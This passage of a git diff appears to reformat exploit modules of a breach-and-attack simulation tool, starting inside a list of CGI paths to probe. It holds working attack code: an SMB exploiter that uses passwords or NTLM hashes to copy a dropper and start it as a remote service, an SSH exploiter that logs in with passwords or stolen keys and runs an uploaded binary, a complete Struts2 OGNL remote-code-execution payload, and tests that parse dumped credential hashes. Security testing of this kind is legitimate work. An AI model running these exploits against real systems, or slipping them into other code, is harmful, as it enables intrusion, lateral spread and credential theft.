r"/cgi-bin/handler", + r"/cgi-bin/handler.cgi", + r"/cgi-bin/handler/netsonar", + r"/cgi-bin/hitview.cgi", + r"/cgi-bin/hsx.cgi", + r"/cgi-bin/html2chtml.cgi", + 
r"/cgi-bin/html2wml.cgi", + r"/cgi-bin/htsearch.cgi", + r"/cgi-bin/hw.sh", # testing + r"/cgi-bin/icat", + r"/cgi-bin/if/admin/nph-build.cgi", + r"/cgi-bin/ikonboard/help.cgi", + r"/cgi-bin/ImageFolio/admin/admin.cgi", + r"/cgi-bin/imageFolio.cgi", + r"/cgi-bin/index.cgi", + r"/cgi-bin/infosrch.cgi", + r"/cgi-bin/jammail.pl", + r"/cgi-bin/journal.cgi", + r"/cgi-bin/lastlines.cgi", + r"/cgi-bin/loadpage.cgi", + r"/cgi-bin/login.cgi", + r"/cgi-bin/logit.cgi", + r"/cgi-bin/log-reader.cgi", + r"/cgi-bin/lookwho.cgi", + r"/cgi-bin/lwgate.cgi", + r"/cgi-bin/MachineInfo", + r"/cgi-bin/MachineInfo", + r"/cgi-bin/magiccard.cgi", + r"/cgi-bin/mail/emumail.cgi", + r"/cgi-bin/maillist.cgi", + r"/cgi-bin/mailnews.cgi", + r"/cgi-bin/mail/nph-mr.cgi", + r"/cgi-bin/main.cgi", + r"/cgi-bin/main_menu.pl", + r"/cgi-bin/man.sh", + r"/cgi-bin/mini_logger.cgi", + r"/cgi-bin/mmstdod.cgi", + r"/cgi-bin/moin.cgi", + r"/cgi-bin/mojo/mojo.cgi", + r"/cgi-bin/mrtg.cgi", + r"/cgi-bin/mt.cgi", + r"/cgi-bin/mt/mt.cgi", + r"/cgi-bin/mt/mt-check.cgi", + r"/cgi-bin/mt/mt-load.cgi", + r"/cgi-bin/mt-static/mt-check.cgi", + r"/cgi-bin/mt-static/mt-load.cgi", + r"/cgi-bin/musicqueue.cgi", + r"/cgi-bin/myguestbook.cgi", + r"/cgi-bin/.namazu.cgi", + r"/cgi-bin/nbmember.cgi", + r"/cgi-bin/netauth.cgi", + r"/cgi-bin/netpad.cgi", + r"/cgi-bin/newsdesk.cgi", + r"/cgi-bin/nlog-smb.cgi", + r"/cgi-bin/nph-emumail.cgi", + r"/cgi-bin/nph-exploitscanget.cgi", + r"/cgi-bin/nph-publish.cgi", + r"/cgi-bin/nph-test.cgi", + r"/cgi-bin/pagelog.cgi", + r"/cgi-bin/pbcgi.cgi", + r"/cgi-bin/perlshop.cgi", + r"/cgi-bin/pfdispaly.cgi", + r"/cgi-bin/pfdisplay.cgi", + r"/cgi-bin/phf.cgi", + r"/cgi-bin/photo/manage.cgi", + r"/cgi-bin/photo/protected/manage.cgi", + r"/cgi-bin/php-cgi", + r"/cgi-bin/php.cgi", + r"/cgi-bin/php.fcgi", + r"/cgi-bin/ping.sh", + r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi", + r"/cgi-bin/pollssi.cgi", + r"/cgi-bin/postcards.cgi", + r"/cgi-bin/powerup/r.cgi", + r"/cgi-bin/printenv", + r"/cgi-bin/probecontrol.cgi", + r"/cgi-bin/profile.cgi", + r"/cgi-bin/publisher/search.cgi", + r"/cgi-bin/quickstore.cgi", + r"/cgi-bin/quizme.cgi", + r"/cgi-bin/ratlog.cgi", + r"/cgi-bin/r.cgi", + r"/cgi-bin/register.cgi", + r"/cgi-bin/replicator/webpage.cgi/", + r"/cgi-bin/responder.cgi", + r"/cgi-bin/robadmin.cgi", + r"/cgi-bin/robpoll.cgi", + r"/cgi-bin/rtpd.cgi", + r"/cgi-bin/sbcgi/sitebuilder.cgi", + r"/cgi-bin/scoadminreg.cgi", + r"/cgi-bin-sdb/printenv", + r"/cgi-bin/sdbsearch.cgi", + r"/cgi-bin/search", + r"/cgi-bin/search.cgi", + r"/cgi-bin/search/search.cgi", + r"/cgi-bin/sendform.cgi", + r"/cgi-bin/shop.cgi", + r"/cgi-bin/shopper.cgi", + r"/cgi-bin/shopplus.cgi", + r"/cgi-bin/showcheckins.cgi", + r"/cgi-bin/simplestguest.cgi", + r"/cgi-bin/simplestmail.cgi", + r"/cgi-bin/smartsearch.cgi", + r"/cgi-bin/smartsearch/smartsearch.cgi", + r"/cgi-bin/snorkerz.bat", + r"/cgi-bin/snorkerz.bat", + r"/cgi-bin/snorkerz.cmd", + r"/cgi-bin/snorkerz.cmd", + r"/cgi-bin/sojourn.cgi", + r"/cgi-bin/spin_client.cgi", + r"/cgi-bin/start.cgi", + r"/cgi-bin/status", + r"/cgi-bin/status_cgi", + r"/cgi-bin/store/agora.cgi", + r"/cgi-bin/store.cgi", + r"/cgi-bin/store/index.cgi", + r"/cgi-bin/survey.cgi", + r"/cgi-bin/sync.cgi", + r"/cgi-bin/talkback.cgi", + r"/cgi-bin/technote/main.cgi", + r"/cgi-bin/test2.pl", + r"/cgi-bin/test-cgi", + r"/cgi-bin/test.cgi", + r"/cgi-bin/testing_whatever", + r"/cgi-bin/test/test.cgi", + r"/cgi-bin/tidfinder.cgi", + r"/cgi-bin/tigvote.cgi", + r"/cgi-bin/title.cgi", + r"/cgi-bin/top.cgi", + r"/cgi-bin/traffic.cgi", + 
r"/cgi-bin/troops.cgi", + r"/cgi-bin/ttawebtop.cgi/", + r"/cgi-bin/ultraboard.cgi", + r"/cgi-bin/upload.cgi", + r"/cgi-bin/urlcount.cgi", + r"/cgi-bin/viewcvs.cgi", + r"/cgi-bin/view_help.cgi", + r"/cgi-bin/viralator.cgi", + r"/cgi-bin/virgil.cgi", + r"/cgi-bin/vote.cgi", + r"/cgi-bin/vpasswd.cgi", + r"/cgi-bin/way-board.cgi", + r"/cgi-bin/way-board/way-board.cgi", + r"/cgi-bin/webbbs.cgi", + r"/cgi-bin/webcart/webcart.cgi", + r"/cgi-bin/webdist.cgi", + r"/cgi-bin/webif.cgi", + r"/cgi-bin/webmail/html/emumail.cgi", + r"/cgi-bin/webmap.cgi", + r"/cgi-bin/webspirs.cgi", + r"/cgi-bin/Web_Store/web_store.cgi", + r"/cgi-bin/whois.cgi", + r"/cgi-bin/whois_raw.cgi", + r"/cgi-bin/whois/whois.cgi", + r"/cgi-bin/wrap", + r"/cgi-bin/wrap.cgi", + r"/cgi-bin/wwwboard.cgi.cgi", + r"/cgi-bin/YaBB/YaBB.cgi", + r"/cgi-bin/zml.cgi", + r"/cgi-mod/index.cgi", + r"/cgis/wwwboard/wwwboard.cgi", + r"/cgi-sys/addalink.cgi", + r"/cgi-sys/defaultwebpage.cgi", + r"/cgi-sys/domainredirect.cgi", + r"/cgi-sys/entropybanner.cgi", + r"/cgi-sys/entropysearch.cgi", + r"/cgi-sys/FormMail-clone.cgi", + r"/cgi-sys/helpdesk.cgi", + r"/cgi-sys/mchat.cgi", + r"/cgi-sys/randhtml.cgi", + r"/cgi-sys/realhelpdesk.cgi", + r"/cgi-sys/realsignup.cgi", + r"/cgi-sys/signup.cgi", + r"/connector.cgi", + r"/cp/rac/nsManager.cgi", + r"/create_release.sh", + r"/CSNews.cgi", + r"/csPassword.cgi", + r"/dcadmin.cgi", + r"/dcboard.cgi", + r"/dcforum.cgi", + r"/dcforum/dcforum.cgi", + r"/debuff.cgi", + r"/debug.cgi", + r"/details.cgi", + r"/edittag/edittag.cgi", + r"/emumail.cgi", + r"/enter_buff.cgi", + r"/enter_bug.cgi", + r"/ez2000/ezadmin.cgi", + r"/ez2000/ezboard.cgi", + r"/ez2000/ezman.cgi", + r"/fcgi-bin/echo", + r"/fcgi-bin/echo", + r"/fcgi-bin/echo2", + r"/fcgi-bin/echo2", + r"/Gozila.cgi", + r"/hitmatic/analyse.cgi", + r"/hp_docs/cgi-bin/index.cgi", + r"/html/cgi-bin/cgicso", + r"/html/cgi-bin/cgicso", + r"/index.cgi", + r"/info.cgi", + r"/infosrch.cgi", + r"/login.cgi", + r"/mailview.cgi", + r"/main.cgi", + r"/megabook/admin.cgi", + r"/ministats/admin.cgi", + r"/mods/apage/apage.cgi", + r"/_mt/mt.cgi", + r"/musicqueue.cgi", + r"/ncbook.cgi", + r"/newpro.cgi", + r"/newsletter.sh", + r"/oem_webstage/cgi-bin/oemapp_cgi", + r"/page.cgi", + r"/parse_xml.cgi", + r"/photodata/manage.cgi", + r"/photo/manage.cgi", + r"/print.cgi", + r"/process_buff.cgi", + r"/process_bug.cgi", + r"/pub/english.cgi", + r"/quikmail/nph-emumail.cgi", + r"/quikstore.cgi", + r"/reviews/newpro.cgi", + r"/ROADS/cgi-bin/search.pl", + r"/sample01.cgi", + r"/sample02.cgi", + r"/sample03.cgi", + r"/sample04.cgi", + r"/sampleposteddata.cgi", + r"/scancfg.cgi", + r"/scancfg.cgi", + r"/servers/link.cgi", + r"/setpasswd.cgi", + r"/SetSecurity.shm", + r"/shop/member_html.cgi", + r"/shop/normal_html.cgi", + r"/site_searcher.cgi", + r"/siteUserMod.cgi", + r"/submit.cgi", + r"/technote/print.cgi", + r"/template.cgi", + r"/test.cgi", + r"/ucsm/isSamInstalled.cgi", + r"/upload.cgi", + r"/userreg.cgi", + r"/users/scripts/submit.cgi", + r"/vood/cgi-bin/vood_view.cgi", + r"/Web_Store/web_store.cgi", + r"/webtools/bonsai/ccvsblame.cgi", + r"/webtools/bonsai/cvsblame.cgi", + r"/webtools/bonsai/cvslog.cgi", + r"/webtools/bonsai/cvsquery.cgi", + r"/webtools/bonsai/cvsqueryform.cgi", + r"/webtools/bonsai/showcheckins.cgi", + r"/wwwadmin.cgi", + r"/wwwboard.cgi", + r"/wwwboard/wwwboard.cgi", ) diff --git a/monkey/infection_monkey/exploit/smbexec.py b/monkey/infection_monkey/exploit/smbexec.py index c6e2424c1..4b5e941f8 100644 --- a/monkey/infection_monkey/exploit/smbexec.py +++ 
b/monkey/infection_monkey/exploit/smbexec.py @@ -5,10 +5,13 @@ from impacket.dcerpc.v5 import scmr, transport from common.utils.attack_utils import ScanStatus, UsageEnum from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.exploit.tools.smb_tools import SmbTools -from infection_monkey.model import (DROPPER_CMDLINE_DETACHED_WINDOWS, - MONKEY_CMDLINE_DETACHED_WINDOWS) +from infection_monkey.model import DROPPER_CMDLINE_DETACHED_WINDOWS, MONKEY_CMDLINE_DETACHED_WINDOWS from infection_monkey.network.smbfinger import SMBFinger from infection_monkey.network.tools import check_tcp_port from infection_monkey.telemetry.attack.t1035_telem import T1035Telem @@ -17,12 +20,12 @@ LOG = getLogger(__name__) class SmbExploiter(HostExploiter): - _TARGET_OS_TYPE = ['windows'] + _TARGET_OS_TYPE = ["windows"] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE - _EXPLOITED_SERVICE = 'SMB' + _EXPLOITED_SERVICE = "SMB" KNOWN_PROTOCOLS = { - '139/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 139), - '445/SMB': (r'ncacn_np:%s[\pipe\svcctl]', 445), + "139/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 139), + "445/SMB": (r"ncacn_np:%s[\pipe\svcctl]", 445), } USE_KERBEROS = False @@ -34,7 +37,7 @@ class SmbExploiter(HostExploiter): if super(SmbExploiter, self).is_os_supported(): return True - if not self.host.os.get('type'): + if not self.host.os.get("type"): is_smb_open, _ = check_tcp_port(self.host.ip_addr, 445) if is_smb_open: smb_finger = SMBFinger() @@ -42,8 +45,8 @@ class SmbExploiter(HostExploiter): else: is_nb_open, _ = check_tcp_port(self.host.ip_addr, 139) if is_nb_open: - self.host.os['type'] = 'windows' - return self.host.os.get('type') in self._TARGET_OS_TYPE + self.host.os["type"] = "windows" + return self.host.os.get("type") in self._TARGET_OS_TYPE return False def _exploit_host(self): @@ -59,25 +62,34 @@ class SmbExploiter(HostExploiter): for user, password, lm_hash, ntlm_hash in creds: try: # copy the file remotely using SMB - remote_full_path = SmbTools.copy_file(self.host, - src_path, - self._config.dropper_target_path_win_32, - user, - password, - lm_hash, - ntlm_hash, - self._config.smb_download_timeout) + remote_full_path = SmbTools.copy_file( + self.host, + src_path, + self._config.dropper_target_path_win_32, + user, + password, + lm_hash, + ntlm_hash, + self._config.smb_download_timeout, + ) if remote_full_path is not None: - LOG.debug("Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)", - self.host, - user, - self._config.hash_sensitive_data(password), - self._config.hash_sensitive_data(lm_hash), - self._config.hash_sensitive_data(ntlm_hash)) + LOG.debug( + "Successfully logged in %r using SMB (%s : (SHA-512) %s : (SHA-512) %s : (SHA-512) %s)", + self.host, + user, + self._config.hash_sensitive_data(password), + self._config.hash_sensitive_data(lm_hash), + self._config.hash_sensitive_data(ntlm_hash), + ) self.report_login_attempt(True, user, password, lm_hash, ntlm_hash) - self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1], - SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1])) + self.add_vuln_port( + "%s or %s" + % ( + SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1], + SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1], + ) + ) exploited = True break else: @@ -93,7 
+105,8 @@ class SmbExploiter(HostExploiter): self._config.hash_sensitive_data(password), self._config.hash_sensitive_data(lm_hash), self._config.hash_sensitive_data(ntlm_hash), - exc) + exc, + ) continue if not exploited: @@ -103,24 +116,29 @@ class SmbExploiter(HostExploiter): self.set_vulnerable_port() # execute the remote dropper in case the path isn't final if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower(): - cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % {'dropper_path': remote_full_path} + \ - build_monkey_commandline(self.host, get_monkey_depth() - 1, - self.vulnerable_port, - self._config.dropper_target_path_win_32) + cmdline = DROPPER_CMDLINE_DETACHED_WINDOWS % { + "dropper_path": remote_full_path + } + build_monkey_commandline( + self.host, + get_monkey_depth() - 1, + self.vulnerable_port, + self._config.dropper_target_path_win_32, + ) else: - cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % {'monkey_path': remote_full_path} + \ - build_monkey_commandline(self.host, - get_monkey_depth() - 1, - vulnerable_port=self.vulnerable_port) + cmdline = MONKEY_CMDLINE_DETACHED_WINDOWS % { + "monkey_path": remote_full_path + } + build_monkey_commandline( + self.host, get_monkey_depth() - 1, vulnerable_port=self.vulnerable_port + ) smb_conn = False for str_bind_format, port in SmbExploiter.KNOWN_PROTOCOLS.values(): rpctransport = transport.DCERPCTransportFactory(str_bind_format % (self.host.ip_addr,)) rpctransport.set_dport(port) rpctransport.setRemoteHost(self.host.ip_addr) - if hasattr(rpctransport, 'set_credentials'): + if hasattr(rpctransport, "set_credentials"): # This method exists only for selected protocol sequences. - rpctransport.set_credentials(user, password, '', lm_hash, ntlm_hash, None) + rpctransport.set_credentials(user, password, "", lm_hash, ntlm_hash, None) rpctransport.set_kerberos(SmbExploiter.USE_KERBEROS) scmr_rpc = rpctransport.get_dce_rpc() @@ -128,7 +146,12 @@ class SmbExploiter(HostExploiter): try: scmr_rpc.connect() except Exception as exc: - LOG.debug("Can't connect to SCM on exploited machine %r port %s : %s", self.host, port, exc) + LOG.debug( + "Can't connect to SCM on exploited machine %r port %s : %s", + self.host, + port, + exc, + ) continue smb_conn = rpctransport.get_smb_connection() @@ -140,12 +163,17 @@ class SmbExploiter(HostExploiter): smb_conn.setTimeout(100000) scmr_rpc.bind(scmr.MSRPC_UUID_SCMR) resp = scmr.hROpenSCManagerW(scmr_rpc) - sc_handle = resp['lpScHandle'] + sc_handle = resp["lpScHandle"] # start the monkey using the SCM - resp = scmr.hRCreateServiceW(scmr_rpc, sc_handle, self._config.smb_service_name, self._config.smb_service_name, - lpBinaryPathName=cmdline) - service = resp['lpServiceHandle'] + resp = scmr.hRCreateServiceW( + scmr_rpc, + sc_handle, + self._config.smb_service_name, + self._config.smb_service_name, + lpBinaryPathName=cmdline, + ) + service = resp["lpServiceHandle"] try: scmr.hRStartServiceW(scmr_rpc, service) status = ScanStatus.USED @@ -156,17 +184,26 @@ class SmbExploiter(HostExploiter): scmr.hRDeleteService(scmr_rpc, service) scmr.hRCloseServiceHandle(scmr_rpc, service) - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - remote_full_path, self.host, cmdline) + LOG.info( + "Executed monkey '%s' on remote victim %r (cmdline=%r)", + remote_full_path, + self.host, + cmdline, + ) - self.add_vuln_port("%s or %s" % (SmbExploiter.KNOWN_PROTOCOLS['139/SMB'][1], - SmbExploiter.KNOWN_PROTOCOLS['445/SMB'][1])) + self.add_vuln_port( + "%s or %s" + % ( + 
SmbExploiter.KNOWN_PROTOCOLS["139/SMB"][1], + SmbExploiter.KNOWN_PROTOCOLS["445/SMB"][1], + ) + ) return True def set_vulnerable_port(self): - if 'tcp-445' in self.host.services: + if "tcp-445" in self.host.services: self.vulnerable_port = "445" - elif 'tcp-139' in self.host.services: + elif "tcp-139" in self.host.services: self.vulnerable_port = "139" else: self.vulnerable_port = None diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index b96a6c2b6..0f5af3258 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -9,13 +9,17 @@ from common.utils.attack_utils import ScanStatus from common.utils.exceptions import FailedExploitationError from common.utils.exploit_enum import ExploitType from infection_monkey.exploit.HostExploiter import HostExploiter -from infection_monkey.exploit.tools.helpers import build_monkey_commandline, get_monkey_depth, get_target_monkey +from infection_monkey.exploit.tools.helpers import ( + build_monkey_commandline, + get_monkey_depth, + get_target_monkey, +) from infection_monkey.model import MONKEY_ARG from infection_monkey.network.tools import check_tcp_port, get_interface_to_target from infection_monkey.telemetry.attack.t1105_telem import T1105Telem from infection_monkey.telemetry.attack.t1222_telem import T1222Telem -__author__ = 'hoffer' +__author__ = "hoffer" LOG = logging.getLogger(__name__) SSH_PORT = 22 @@ -23,9 +27,9 @@ TRANSFER_UPDATE_RATE = 15 class SSHExploiter(HostExploiter): - _TARGET_OS_TYPE = ['linux', None] + _TARGET_OS_TYPE = ["linux", None] EXPLOIT_TYPE = ExploitType.BRUTE_FORCE - _EXPLOITED_SERVICE = 'SSH' + _EXPLOITED_SERVICE = "SSH" def __init__(self, host): super(SSHExploiter, self).__init__(host) @@ -42,29 +46,27 @@ class SSHExploiter(HostExploiter): for user, ssh_key_pair in user_ssh_key_pairs: # Creating file-like private key for paramiko - pkey = io.StringIO(ssh_key_pair['private_key']) - ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip']) + pkey = io.StringIO(ssh_key_pair["private_key"]) + ssh_string = "%s@%s" % (ssh_key_pair["user"], ssh_key_pair["ip"]) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) try: pkey = paramiko.RSAKey.from_private_key(pkey) - except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException): + except (IOError, paramiko.SSHException, paramiko.PasswordRequiredException): LOG.error("Failed reading ssh key") try: - ssh.connect(self.host.ip_addr, - username=user, - pkey=pkey, - port=port) - LOG.debug("Successfully logged in %s using %s users private key", - self.host, ssh_string) + ssh.connect(self.host.ip_addr, username=user, pkey=pkey, port=port) + LOG.debug( + "Successfully logged in %s using %s users private key", self.host, ssh_string + ) self.report_login_attempt(True, user, ssh_key=ssh_string) return ssh except Exception: ssh.close() - LOG.debug("Error logging into victim %r with %s" - " private key", self.host, - ssh_string) + LOG.debug( + "Error logging into victim %r with %s" " private key", self.host, ssh_string + ) self.report_login_attempt(False, user, ssh_key=ssh_string) continue raise FailedExploitationError @@ -77,21 +79,27 @@ class SSHExploiter(HostExploiter): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.WarningPolicy()) try: - ssh.connect(self.host.ip_addr, - username=user, - password=current_password, - port=port) + ssh.connect(self.host.ip_addr, username=user, password=current_password, port=port) - 
LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)", - self.host, user, self._config.hash_sensitive_data(current_password)) + LOG.debug( + "Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)", + self.host, + user, + self._config.hash_sensitive_data(current_password), + ) self.add_vuln_port(port) self.report_login_attempt(True, user, current_password) return ssh except Exception as exc: - LOG.debug("Error logging into victim %r with user" - " %s and password (SHA-512) '%s': (%s)", self.host, - user, self._config.hash_sensitive_data(current_password), exc) + LOG.debug( + "Error logging into victim %r with user" + " %s and password (SHA-512) '%s': (%s)", + self.host, + user, + self._config.hash_sensitive_data(current_password), + exc, + ) self.report_login_attempt(False, user, current_password) ssh.close() continue @@ -102,8 +110,8 @@ class SSHExploiter(HostExploiter): port = SSH_PORT # if ssh banner found on different port, use that port. for servkey, servdata in list(self.host.services.items()): - if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'): - port = int(servkey.replace('tcp-', '')) + if servdata.get("name") == "ssh" and servkey.startswith("tcp-"): + port = int(servkey.replace("tcp-", "")) is_open, _ = check_tcp_port(self.host.ip_addr, port) if not is_open: @@ -119,12 +127,12 @@ class SSHExploiter(HostExploiter): LOG.debug("Exploiter SSHExploiter is giving up...") return False - if not self.host.os.get('type'): + if not self.host.os.get("type"): try: - _, stdout, _ = ssh.exec_command('uname -o') + _, stdout, _ = ssh.exec_command("uname -o") uname_os = stdout.read().lower().strip().decode() - if 'linux' in uname_os: - self.host.os['type'] = 'linux' + if "linux" in uname_os: + self.host.os["type"] = "linux" else: LOG.info("SSH Skipping unknown os: %s", uname_os) return False @@ -132,21 +140,25 @@ class SSHExploiter(HostExploiter): LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc) return False - if not self.host.os.get('machine'): + if not self.host.os.get("machine"): try: - _, stdout, _ = ssh.exec_command('uname -m') + _, stdout, _ = ssh.exec_command("uname -m") uname_machine = stdout.read().lower().strip().decode() - if '' != uname_machine: - self.host.os['machine'] = uname_machine + if "" != uname_machine: + self.host.os["machine"] = uname_machine except Exception as exc: LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc) if self.skip_exist: - _, stdout, stderr = ssh.exec_command("head -c 1 %s" % self._config.dropper_target_path_linux) + _, stdout, stderr = ssh.exec_command( + "head -c 1 %s" % self._config.dropper_target_path_linux + ) stdout_res = stdout.read().strip() if stdout_res: # file exists - LOG.info("Host %s was already infected under the current configuration, done" % self.host) + LOG.info( + "Host %s was already infected under the current configuration, done" % self.host + ) return True # return already infected src_path = get_target_monkey(self.host) @@ -160,33 +172,44 @@ class SSHExploiter(HostExploiter): self._update_timestamp = time.time() with monkeyfs.open(src_path) as file_obj: - ftp.putfo(file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path), - callback=self.log_transfer) + ftp.putfo( + file_obj, + self._config.dropper_target_path_linux, + file_size=monkeyfs.getsize(src_path), + callback=self.log_transfer, + ) ftp.chmod(self._config.dropper_target_path_linux, 0o777) status = ScanStatus.USED - 
T1222Telem(ScanStatus.USED, "chmod 0777 %s" % self._config.dropper_target_path_linux, self.host).send() + T1222Telem( + ScanStatus.USED, + "chmod 0777 %s" % self._config.dropper_target_path_linux, + self.host, + ).send() ftp.close() except Exception as exc: LOG.debug("Error uploading file into victim %r: (%s)", self.host, exc) status = ScanStatus.SCANNED - T1105Telem(status, - get_interface_to_target(self.host.ip_addr), - self.host.ip_addr, - src_path).send() + T1105Telem( + status, get_interface_to_target(self.host.ip_addr), self.host.ip_addr, src_path + ).send() if status == ScanStatus.SCANNED: return False try: cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) - cmdline += build_monkey_commandline(self.host, - get_monkey_depth() - 1, - vulnerable_port=SSH_PORT) + cmdline += build_monkey_commandline( + self.host, get_monkey_depth() - 1, vulnerable_port=SSH_PORT + ) cmdline += " > /dev/null 2>&1 &" ssh.exec_command(cmdline) - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, self.host, cmdline) + LOG.info( + "Executed monkey '%s' on remote victim %r (cmdline=%r)", + self._config.dropper_target_path_linux, + self.host, + cmdline, + ) ssh.close() self.add_executed_cmd(cmdline) diff --git a/monkey/infection_monkey/exploit/struts2.py b/monkey/infection_monkey/exploit/struts2.py index 9aba749a7..c08c174fb 100644 --- a/monkey/infection_monkey/exploit/struts2.py +++ b/monkey/infection_monkey/exploit/struts2.py @@ -21,15 +21,15 @@ DOWNLOAD_TIMEOUT = 300 class Struts2Exploiter(WebRCE): - _TARGET_OS_TYPE = ['linux', 'windows'] - _EXPLOITED_SERVICE = 'Struts2' + _TARGET_OS_TYPE = ["linux", "windows"] + _EXPLOITED_SERVICE = "Struts2" def __init__(self, host): super(Struts2Exploiter, self).__init__(host, None) def get_exploit_config(self): exploit_config = super(Struts2Exploiter, self).get_exploit_config() - exploit_config['dropper'] = True + exploit_config["dropper"] = True return exploit_config def build_potential_urls(self, ports, extensions=None): @@ -47,10 +47,12 @@ class Struts2Exploiter(WebRCE): @staticmethod def get_redirected(url): # Returns false if url is not right - headers = {'User-Agent': 'Mozilla/5.0'} + headers = {"User-Agent": "Mozilla/5.0"} request = urllib.request.Request(url, headers=headers) try: - return urllib.request.urlopen(request, context=ssl._create_unverified_context()).geturl() + return urllib.request.urlopen( + request, context=ssl._create_unverified_context() + ).geturl() except urllib.error.URLError: LOG.error("Can't reach struts2 server") return False @@ -63,24 +65,26 @@ class Struts2Exploiter(WebRCE): """ cmd = re.sub(r"\\", r"\\\\", cmd) cmd = re.sub(r"'", r"\\'", cmd) - payload = "%%{(#_='multipart/form-data')." \ - "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ - "(#_memberAccess?" \ - "(#_memberAccess=#dm):" \ - "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \ - "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \ - "(#ognlUtil.getExcludedPackageNames().clear())." \ - "(#ognlUtil.getExcludedClasses().clear())." \ - "(#context.setMemberAccess(#dm))))." \ - "(#cmd='%s')." \ - "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \ - "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ - "(#p=new java.lang.ProcessBuilder(#cmds))." \ - "(#p.redirectErrorStream(true)).(#process=#p.start())." 
\ - "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \ - "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \ - "(#ros.flush())}" % cmd - headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} + payload = ( + "%%{(#_='multipart/form-data')." + "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." + "(#_memberAccess?" + "(#_memberAccess=#dm):" + "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." + "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." + "(#ognlUtil.getExcludedPackageNames().clear())." + "(#ognlUtil.getExcludedClasses().clear())." + "(#context.setMemberAccess(#dm))))." + "(#cmd='%s')." + "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." + "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." + "(#p=new java.lang.ProcessBuilder(#cmds))." + "(#p.redirectErrorStream(true)).(#process=#p.start())." + "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." + "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." + "(#ros.flush())}" % cmd + ) + headers = {"User-Agent": "Mozilla/5.0", "Content-Type": payload} try: request = urllib.request.Request(url, headers=headers) # Timeout added or else we would wait for all monkeys' output diff --git a/monkey/infection_monkey/exploit/tests/test_zerologon.py b/monkey/infection_monkey/exploit/tests/test_zerologon.py index efc8a75e2..b4a0833ce 100644 --- a/monkey/infection_monkey/exploit/tests/test_zerologon.py +++ b/monkey/infection_monkey/exploit/tests/test_zerologon.py @@ -28,9 +28,7 @@ def zerologon_exploiter_object(monkeypatch): def test_assess_exploit_attempt_result_no_error(zerologon_exploiter_object): dummy_exploit_attempt_result = {"ErrorCode": 0} - assert zerologon_exploiter_object.assess_exploit_attempt_result( - dummy_exploit_attempt_result - ) + assert zerologon_exploiter_object.assess_exploit_attempt_result(dummy_exploit_attempt_result) def test_assess_exploit_attempt_result_with_error(zerologon_exploiter_object): @@ -56,8 +54,7 @@ def test_assess_restoration_attempt_result_not_restored(zerologon_exploiter_obje def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object): mock_dumped_secrets = [ - f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" - for i in range(len(USERS)) + f"{USERS[i]}:{RIDS[i]}:{LM_HASHES[i]}:{NT_HASHES[i]}:::" for i in range(len(USERS)) ] expected_extracted_creds = { USERS[0]: { @@ -71,24 +68,17 @@ def test__extract_user_creds_from_secrets_good_data(zerologon_exploiter_object): "nt_hash": NT_HASHES[1], }, } - assert ( - zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) - is None - ) + assert zerologon_exploiter_object._extract_user_creds_from_secrets(mock_dumped_secrets) is None assert zerologon_exploiter_object._extracted_creds == expected_extracted_creds def test__extract_user_creds_from_secrets_bad_data(zerologon_exploiter_object): mock_dumped_secrets = [ - f"{USERS[i]}:{RIDS[i]}:::{LM_HASHES[i]}:{NT_HASHES[i]}:::" - for i in range(len(USERS)) + 